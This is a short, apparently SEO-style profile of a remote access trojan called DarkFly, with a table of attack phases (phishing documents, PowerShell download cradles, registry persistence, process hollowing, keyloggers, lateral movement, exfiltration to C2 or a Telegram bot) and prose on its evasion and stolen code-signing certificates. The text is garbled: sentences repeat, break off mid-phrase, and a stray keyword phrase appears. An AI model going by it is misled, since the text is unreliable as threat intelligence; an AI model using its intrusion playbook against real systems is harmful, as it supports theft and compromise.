| Phase | Tools/Methods Used |
|-------|--------------------|
| Delivery | Phishing email with macro-enabled Office doc or ISO containing loader |
| Execution | PowerShell download cradle or WScript launcher |
| Persistence | Registry Run key + scheduled task |
| Evasion | Process hollowing into notepad.exe or regsvr32.exe |
| Recon | Keylogger, browser stealer, netstat -an, ipconfig /all |
| Lateral Movement | SMB copy + WMI execution or RDP hijacking |
| Exfiltration | HTTPS POST to C2 or Telegram bot API |
The “tool use” in DarkFly isn't just about technical capability—it's about process discipline. Operators following DarkFly principles adhere to strict rules of engagement: darkfly tool use
These OPSEC measures make DarkFly incidents extraordinarily hard to correlate across different victim environments. Crucially, DarkFly tools are often signed with stolen
Once resident on a compromised host, DarkFly deploys "living-off-the-land" (LotL) binaries for lateral movement. Instead of uploading mimikatz.exe, it uses: making detection challenging.
Crucially, DarkFly tools are often signed with stolen or revoked code-signing certificates, bypassing Windows Defender SmartScreen and Application Control policies.
DarkFly is a sophisticated Remote Access Trojan (RAT) known for its modular architecture, anti-detection mechanisms, and a broad set of tooling designed for data theft, surveillance, and lateral movement. Its toolset mimics legitimate system utilities but repurposes them for malicious ends, making detection challenging.
